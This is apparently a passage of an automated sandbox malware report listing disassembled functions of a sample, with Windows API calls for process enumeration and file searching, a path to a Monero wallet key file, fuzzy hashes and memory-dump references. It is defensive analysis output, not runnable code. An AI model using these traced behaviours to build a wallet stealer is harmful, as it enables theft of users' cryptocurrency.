                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000F05BF), ref: 000E885A
                            • Process32First.KERNEL32(?,00000128), ref: 000E886E
                            • Process32Next.KERNEL32(?,00000128), ref: 000E8883
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • CloseHandle.KERNEL32(?), ref: 000E88F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 8a8450d684c0dbdadfc92386ca01685541a870c2e390d707d4d6ae749e3b9c05
                            • Instruction ID: bf91fe15963f7231cbbf25d8eba3b991a6c5669b0fad15e5cb5ede11254b15be
                            • Opcode Fuzzy Hash: 8a8450d684c0dbdadfc92386ca01685541a870c2e390d707d4d6ae749e3b9c05
                            • Instruction Fuzzy Hash: 26315C71A01258AFCB25DF96CD51FEEB378EB4A700F104199F10EB61A2DB306A44CFA1
                            Function 0014FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0014FE13
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0014FE2C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value___vcrt_
                            • String ID:
                            • API String ID: 1426506684-0
                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction ID: bf19800c6ab2dca08c5ecdcc44a5b212a0b8e65f23fb39b4286eda9e47a502dd
                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction Fuzzy Hash: 9801D432109721FEF63526745CC9A6B3694EB117B7732433EF926A82F2EF528C469140
                            Function 000E9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(000E3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,000E3D3E,?), ref: 000E948C
                            • GetFileSizeEx.KERNEL32(000000FF,000E3D3E), ref: 000E94A9
                            • CloseHandle.KERNEL32(000000FF), ref: 000E94B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID:
                            • API String ID: 1378416451-0
                            • Opcode ID: c6bacdcda77fb51165b46fd5508e44a06ee484dc7b21c8a7751bc55eed14a011
                            • Instruction ID: 093524c64b766cef87a0e18a579046d079adb1dfdc48aa5aed24307668a3f622
                            • Opcode Fuzzy Hash: c6bacdcda77fb51165b46fd5508e44a06ee484dc7b21c8a7751bc55eed14a011
                            • Instruction Fuzzy Hash: AFF04F79E44208BFDB10DFB1EC89F9E77F9AB48710F10C654FA11A72C0D67096018B80
                            Function 000ECA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 000ECA7E
                              • Part of subcall function 000EC2A0: __amsg_exit.LIBCMT ref: 000EC2B0
                            • __getptd.LIBCMT ref: 000ECA95
                            • __amsg_exit.LIBCMT ref: 000ECAA3
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 000ECAC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 5424a08733268a65173ce103d3ab4b92ed6e08675097624ff91440261c4335d0
                            • Instruction ID: 1299d40d5fc5bd189a1c3ae69015ea8410f845d276901910ef956946d87b4655
                            • Opcode Fuzzy Hash: 5424a08733268a65173ce103d3ab4b92ed6e08675097624ff91440261c4335d0
                            • Instruction Fuzzy Hash: 41F0C2319442989FF620FBAA5803F9F33A0AF40718F18015DF1047A5D3CB255D429682
                            Function 001504D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Catch
                            • String ID: MOC$RCC
                            • API String ID: 78271584-2084237596
                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction ID: d9f242156691a9444b3eb530cf3f5d9ad341a9014d06c9989ab0b5912d562489
                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction Fuzzy Hash: 56415971900209EFCF16DF98DC81AEEBBB5BF48305F188199FD246A261E3359A54DF50
                            Function 000E5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E51CA
                            • lstrcat.KERNEL32(?,000F1058), ref: 000E51E7
                            • lstrcat.KERNEL32(?,00D491F8), ref: 000E51FB
                            • lstrcat.KERNEL32(?,000F105C), ref: 000E520D
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4B7C
                              • Part of subcall function 000E4B60: FindFirstFileA.KERNEL32(?,?), ref: 000E4B93
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E4BC1
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4BD7
                              • Part of subcall function 000E4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4DCD
                              • Part of subcall function 000E4B60: FindClose.KERNEL32(000000FF), ref: 000E4DE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: a894ba662e29eae8c2a5feee5c7eb98ab0886fed5535398a83438d62ea703249
                            • Instruction ID: 0c034b01928da1b8894fb9c0f04347bd981aac015908d96b8168589df8b70850
                            • Opcode Fuzzy Hash: a894ba662e29eae8c2a5feee5c7eb98ab0886fed5535398a83438d62ea703249
                            • Instruction Fuzzy Hash: E321FC76A00208EFDB14FBB0EC87EED333C9B55300F004595B65956192EE749AC88FA1